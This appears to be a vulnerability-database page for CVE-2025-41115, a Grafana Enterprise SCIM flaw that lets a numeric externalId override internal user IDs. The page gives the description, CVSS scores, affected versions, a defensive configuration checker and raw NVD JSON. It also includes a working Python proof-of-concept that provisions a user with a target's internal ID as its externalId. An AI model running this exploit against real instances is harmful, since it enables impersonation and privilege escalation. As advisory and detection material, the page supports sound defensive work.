Security Vulnerability Report
CVE-2025-41115 CVSS 10.0 CRITICAL

CVE-2025-41115

Published: 2025-11-21 15:15:52
Last Modified: 2026-01-08 16:39:45

Description

SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management.

In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow internal user IDs to be overridden and lead to impersonation or privilege escalation.

This vulnerability applies only if all of the following conditions are met:
- `enableSCIM` feature flag set to true
- `user_sync_enabled` config option in the `[auth.scim]` block set to true

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:* - VULNERABLE
Grafana Enterprise 12.x (SCIM enabled)
Grafana Cloud (SCIM enabled)
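
An added example, not part of the original record or Grafana's own code: a checker that tests one instance against the two configuration conditions in the description and the affected version range given in the record's CPE match (12.0.0 up to, not including, 12.2.1). It assumes the toggle is written in `[feature_toggles]` either as `enable = ...` or as `enableSCIM = true`; `SAMPLE_INI` and all function names are constructed for illustration.

```python
import configparser

# Affected range from this record's CPE match: 12.0.0 <= version < 12.2.1
FIRST_AFFECTED, FIRST_FIXED = (12, 0, 0), (12, 2, 1)
TRUTHY = {"true", "1", "yes", "on"}


def parse_version(text):
    """'v12.1.0+security-01' -> (12, 1, 0); build/pre-release suffixes dropped."""
    core = text.strip().lstrip("v").split("+")[0].split("-")[0]
    nums = [int(p) for p in core.split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def scim_conditions(ini_text):
    """Return (enableSCIM toggle on, [auth.scim] user_sync_enabled on).

    Reads the ini text only; settings overridden through the environment
    are not examined here.
    """
    cfg = configparser.ConfigParser(interpolation=None, strict=False,
                                    inline_comment_prefixes=(";", "#"))
    cfg.optionxform = str                       # keep the case of 'enableSCIM'
    cfg.read_string("[__root__]\n" + ini_text)  # tolerate keys before any section
    toggles = dict(cfg["feature_toggles"]) if cfg.has_section("feature_toggles") else {}
    # Assumption: toggles appear as 'enable = a,b' or as 'name = true'.
    listed = toggles.get("enable", "").replace(",", " ").split()
    flag = "enableSCIM" in listed or toggles.get("enableSCIM", "").strip().lower() in TRUTHY
    sync = cfg.get("auth.scim", "user_sync_enabled", fallback="").strip().lower() in TRUTHY
    return flag, sync


def assess(version, ini_text):
    """Classify one instance against the conditions listed for CVE-2025-41115."""
    in_range = FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED
    flag, sync = scim_conditions(ini_text)
    return {"version_in_range": in_range, "enableSCIM": flag,
            "user_sync_enabled": sync, "exposed": in_range and flag and sync}


# Constructed sample configuration, not taken from a real deployment.
SAMPLE_INI = """\
app_mode = production
[feature_toggles]
enable = otherToggle, enableSCIM
[auth.scim]
user_sync_enabled = true   ; constructed sample
"""

if __name__ == "__main__":
    print(assess("12.1.0", SAMPLE_INI))
```
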

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-41115 PoC - Grafana SCIM User ID Override
import requests
import json
import sys

# Configuration
GRAFANA_URL = "https://your-grafana-instance.com"
SCIM_TOKEN = "your-scim-bearer-token"
TARGET_USER_INTERNAL_ID = 123  # Target user's internal numeric ID


def create_malicious_user():
    """Create a user with malicious externalId to override internal user ID"""
    headers = {
        "Authorization": f"Bearer {SCIM_TOKEN}",
        "Content-Type": "application/scim+json"
    }

    # Malicious SCIM user creation with internal ID as externalId
    payload = {
        "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
        "userName": "[email protected]",
        "name": {
            "givenName": "Attacker",
            "familyName": "User"
        },
        "emails": [{
            "value": "[email protected]",
            "primary": True
        }],
        "externalId": str(TARGET_USER_INTERNAL_ID),
        "active": True
    }

    try:
        response = requests.post(
            f"{GRAFANA_URL}/api/scim/v2/Users",
            headers=headers,
            json=payload,
            verify=False,
            timeout=30
        )
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {json.dumps(response.json(), indent=2)}")

        if response.status_code in [200, 201]:
            print("[+] User created successfully - internal ID override possible!")
            return True
        else:
            print("[-] Failed to create user")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("[*] CVE-2025-41115 PoC - Grafana SCIM User ID Override")
    print("[*] Target: Grafana Enterprise/Cloud 12.x with SCIM enabled")
    create_malicious_user()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41115", "sourceIdentifier": "[email protected]", "published": "2025-11-21T15:15:52.283", "lastModified": "2026-01-08T16:39:45.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management.\n\nIn Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow to override internal user IDs and lead to impersonation or privilege escalation.\n\nThis vulnerability applies only if all of the following conditions are met:\n- `enableSCIM` feature flag set to true\n- `user_sync_enabled` config option in the `[auth.scim]` block set to true"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": 
"Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.2.1", "matchCriteriaId": "FB8C7E22-7509-4CF8-AEFF-9F5AE2F04B93"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/CVE-2025-41115", "source": "[email protected]", "tags": ["Broken Link"]}]}}